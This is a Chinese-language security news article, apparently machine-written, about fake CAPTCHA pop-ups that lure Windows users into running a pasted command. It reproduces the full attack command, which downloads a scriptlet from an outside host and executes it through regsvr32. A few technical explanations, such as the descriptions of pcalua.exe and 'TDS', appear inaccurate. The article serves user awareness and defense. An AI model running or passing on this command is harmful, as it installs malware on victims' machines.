新型偽 CAPTCHA 詐騙散佈惡意程式
網路安全

新型偽 CAPTCHA 詐騙散佈惡意程式

AI News Bot
2026-09-19
預計閱讀 1 分鐘原文來源

新型偽 CAPTCHA 詐騙散佈惡意程式

核心重點

近期安全研究者發現,攻擊者以「偽 CAPTCHA」的外觀欺騙使用者,迫使其下載並執行惡意程式。此手法不僅利用人們對驗證碼的熟悉度,還會根據使用者的作業系統與 IP 類型動態調整載荷,形成高度客製化的攻擊鏈。

背景說明

傳統 CAPTCHA(完全自動化公共圖靈測試)本是防止機器人自動提交表單的安全機制。2026 年 9 月 16 日,有部落格文章首次揭露「偽 CAPTCHA」變種——攻擊者在彈出視窗中要求受害者執行 Windows 金鑰 + R(開啟執行對話框)的指令,並貼上類似以下的腳本:


pcalua.exe -a cmd -c "/c curl.exe -s https://193-233-126-53.sslip.io/d3f8a142c9/verification.sct -o %TEMP%\v.sct&&regsvr32 /s /n /u /i:%TEMP%\v.sct scrobj.dll"

其中 pcalua.exe 為 Windows 的程式安裝程式,curl.exe 下載遠端檔案,regsvr32 再將下載的 .sct(腳本檔)注冊執行,完成惡意程式的植入。

攻擊手法解析

  1. 使用者代理偵測

    部分程式碼會檢查 使用者代理字串(User‑Agent),只對 Windows 使用者顯示偽 CAPTCHA。Linux 使用者若未偽造代理,通常不會看到此詐騙。

  2. TDS(惡意指令與偵測系統)指紋

    受害者的裝置與網路資訊會被即時指紋化。根據指紋結果,系統會把 資料中心 IP(多數 URL 掃描器使用的來源)導向乾淨頁面;而 住宅或行動 IP 則會收到真正的惡意載荷。若偵測到是機器人或掃描器,則改為導向變現網站。

  3. 實際案例

    • Carnival Cruise Line 的官方郵件被植入相同偽 CAPTCHA,導致收件人下載惡意程式。

    • 柏林 政府在 2026 年 8 月遭受 ClickFix 變種攻擊,攻擊流程與偽 CAPTCHA 十分相似,最終導致大規模勒索。

受影響範圍與警示

  • 目標平台:主要針對 Windows 桌面環境,因為指令需透過 pcalua.exe、regsvr32 等 Windows 原生工具執行。
  • IP 依賴:住宅與行動使用者的 IP 更易成為惡意載荷的受眾,提升了攻擊成功率。
  • 偽裝手法:將熟悉的驗證流程包裝成攻擊載體,使受害者在不知情的情況下執行危險指令。

防範建議與未來展望

  • 立即關閉:若 CAPTCHA 要求「下載軟體、開啟終端機或執行指令」,應立即關閉頁面。正當的驗證不會涉及此類操作。
  • 加強瀏覽器防護:使用具備惡意腳本偵測的瀏覽器擴充套件,或啟用企業級網路防火牆的 URL 過濾功能。
  • 教育使用者:企業與學校應定期舉辦釣魚與偽 CAPTCHA 認知訓練,降低因習慣性點擊而受感染的風險。
  • 持續追蹤:研究人員已發表完整調查報告與白皮書,建議安全團隊持續監控 ClickFix、FileFix 等相關關鍵字,以掌握新變種的出現。

結語:偽 CAPTCHA 把人類驗證的「安全感」反向利用,成為新型攻擊向量。唯有提升警覺、加強技術防護,才能在這波詐騙潮中保持資訊安全。

分享